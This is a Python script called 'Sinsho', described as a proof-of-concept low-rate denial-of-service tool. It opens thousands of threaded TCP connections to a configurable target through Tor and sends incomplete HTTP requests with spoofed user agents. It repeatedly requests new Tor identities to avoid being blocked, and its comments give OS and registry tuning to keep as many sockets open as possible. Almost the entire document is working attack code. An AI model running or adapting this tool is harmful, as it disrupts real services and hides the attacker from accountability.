Sinsho – Low Rate Denial of Service

Sinsho is a proof of concept denial of service software that takes advantage of vulnerabilities in the TCP/IP Protocol. It is a proof of concept software able to create many connections in a Timed Wait/Half Open state.

### In order to use this script you will need to adjust values for
### max open file descriptors on your operating system
### How this is done is dependant on your operating system

### Debian ###
### sysctl -w fs.file-max=1000000 ###
### ulimit -n 100000 ###

### /proc/sys/net/ipv4/
### tcp_retries1, tcp_retries2

### sysctl -w net.ipv4.tcp_retries1=1
### sysctl -w net.ipv4.tcp_retries2=1
### sysctl -w net.ipv4.tcp_fin_timeout=1


# HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TCPIP\Parameters
# TcpTimedWaitDelay - 300
# TcpMaxDataRetransmissions - 1
# TcpMaxConnectRetransmissions - 1
# InitialRttData - 65535

# Windows 7 SP1 - File Handle Quota
# HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows\
# USERProcessHandleQuota - 100000

import os, sys
import socket
import socks
import struct
import time
import random
from threading import *
import errno


##### GLOBALS #####
##### CHANGE THESE VALUE #####

target = "127.0.0.1"        # Will not work against loopback - change this
port = 14569
connections = 200           # Connections per thread
threads = 100000            # Open File Descriptors/Sockets
torChange = 300             # Time between Tor IP Change in seconds
torPort = 9050       
torControlPort = 9051       # Type in terminal "tor ControlPort 9051"

##################


### This is the thread sleep time
### Or iteration time between creating new threads
timeout = 1.0 # Edit if needed
##################


useragents = [
 "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)",
 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)",
 "Googlebot/2.1 (http://www.googlebot.com/bot.html)",
 "Opera/9.20 (Windows NT 6.0; U; en)",
 "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)",
 "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)",
 "Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0",
 "Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16",
 "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)", # maybe not
 "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13"
 "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)",
 "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
 "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)",
 "Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)",
 "Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)",
 "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8",
 "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7",
 "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
 "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)",
 "YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)"
]


def log(message):
    print(message)


def newIdentity():
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP) 
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
    sock.settimeout(None)
    sock.connect(("127.0.0.1", torControlPort))
    while True:
        try:
            sock.send('AUTHENTICATE \"\"\r\nSIGNAL NEWNYM\r\n')            
            log("Tor Auth: success!")
            log("New identity requested")
            sock.recv(1024)
            log("Reply: from Tor")
        except socket.error, e:
            if isinstance(e.args, tuple):
                if e[0] == errno.EPIPE:
                    log("Broken Pipe: socket error %s" % e)
                else:
                    # determine and handle different error
                    log("Socket error %s" % e)
                    pass
            else:
                #log("Socket error %s" % e)
                pass
        time.sleep(torChange)
    return sock


def initTorCon(target, port):
    sock = socks.socksocket()
    sock.setproxy(socks.PROXY_TYPE_SOCKS5, addr="127.0.0.1", port=torPort)
    sock.settimeout(None)
    sock.connect((target, port))
    return sock

 
def sinsho():
    socks = {}
    while True:
        for i in range(connections):
            socks[i] = initTorCon(target, port)
            data = "GET / HTTP/1.1\r\n"
            data += "Host: %s\r\n" % (target)
            data += "User-Agent: %s" % (random.choice(useragents))
            socks[i].send(data, socket.MSG_OOB | socket.MSG_DONTROUTE)
            log("[+] Packet data sent")

            
def main():
    thread_array = []
    log("[+] Initiating Sinsho")
    log("[+] Target: %s" % target)
    log("[+] Port: %s" % port)    
    log("[+] Starting Single Tor Thread")
    thread = Thread(target = newIdentity)
    thread.start()
    
    for i in range(threads):
        thread = Thread(target = sinsho)
        thread.start()
        thread_array.append(thread)
        time.sleep(timeout)
    
    for thread in thread_array:
        thread.join()
        
    time.sleep(torChange)


if __name__ == '__main__':
    main()